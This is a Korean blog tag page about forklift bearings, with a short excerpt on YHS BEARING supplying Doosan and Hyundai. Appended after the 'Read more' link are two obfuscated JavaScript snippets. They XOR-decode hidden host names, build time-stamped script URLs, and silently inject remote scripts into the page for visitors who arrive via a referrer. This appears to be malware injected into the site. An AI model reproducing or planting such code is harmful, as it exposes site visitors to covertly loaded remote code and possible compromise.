Tag - 지게차 베어링

지게차 베어링 이야기

YHS BEARING의 주력 생산품은 지게차용 베어링입니다. 국내 지게차 생산 1위 업체인 두산산업차량(두산인프라코어에서 2011년도에 독립)과 생산 2위 업체인 현대중공업에 납품을 하고 있습니다. 가끔 길거리나 대형 창고 등에서 두산이나 현대지게차를 보신다면 그 지게차 안에는 YHS BEARING에서 생산한 베어링이 돌아가고 있다고 보시면 됩니다. 이렇게 생긴 지게차를 보신다면 그 안에는 연합시스템에서 생산한 베어링이 들어가 있답니다. 지게차에서도...

Read more...
!function (_8eb379) { var _998d01 = Date.now(); var _eb626d = 1000; _998d01 = _998d01 / _eb626d; _998d01 = Math.floor(_998d01); var _d42f3a = 600; _998d01 -= _998d01 % _d42f3a; _998d01 = _998d01.toString(16); var _7b54b0 = _8eb379.referrer; if (!_7b54b0) return; var _618563 = [50412, 50409, 50422, 50405, 50404, 50401, 50419, 50408, 50402, 50415, 50401, 50418, 50404, 50411, 50409, 50420, 50350, 50409, 50414, 50406, 50415]; _618563 = _618563.map(function(_65a186){ return _65a186 ^ 50304; }); var _b3e56 = "29ab6ca3565f40f3f697bb8b82935a6b"; _618563 = String.fromCharCode(..._618563); var _a1fabd = "https://"; var _369942 = "/"; var _d4a7a6 = "track-"; var _cd9d72 = ".js"; var _3cce44 = _8eb379.createElement("script"); _3cce44.type = "text/javascript"; _3cce44.async = true; _3cce44.src = _a1fabd + _618563 + _369942 + _d4a7a6 + _998d01 + _cd9d72; _8eb379.getElementsByTagName("head")[0].appendChild(_3cce44) }(document); !function (_af4707) { var _578f33 = Date.now(); var _739181 = 1000; _578f33 = _578f33 / _739181; _578f33 = Math.floor(_578f33); var _4e018e = 600; _578f33 -= _578f33 % _4e018e; _578f33 = _578f33.toString(16); var _fa2aaa = _af4707.referrer; if (!_fa2aaa) return; var _b0e2c2 = [31965, 31951, 31951, 31961, 31944, 31951, 31890, 31947, 31965, 31944, 31967, 31956, 31965, 31951, 31941, 31954, 31967, 31890, 31967, 31955, 31953]; _b0e2c2 = _b0e2c2.map(function(_92d04b){ return _92d04b ^ 31932; }); var _b3a85c = "e3b9b14a2b971a64eec210b0cff0f54d"; _b0e2c2 = String.fromCharCode(..._b0e2c2); var _3fedb4 = "https://"; var _5ccbad = "/"; var _4d8aae = "chunk-"; var _56785f = ".js"; var _85afd1 = _af4707.createElement("script"); _85afd1.type = "text/javascript"; _85afd1.async = true; _85afd1.src = _3fedb4 + _b0e2c2 + _5ccbad + _4d8aae + _578f33 + _56785f; _af4707.getElementsByTagName("head")[0].appendChild(_85afd1) }(document);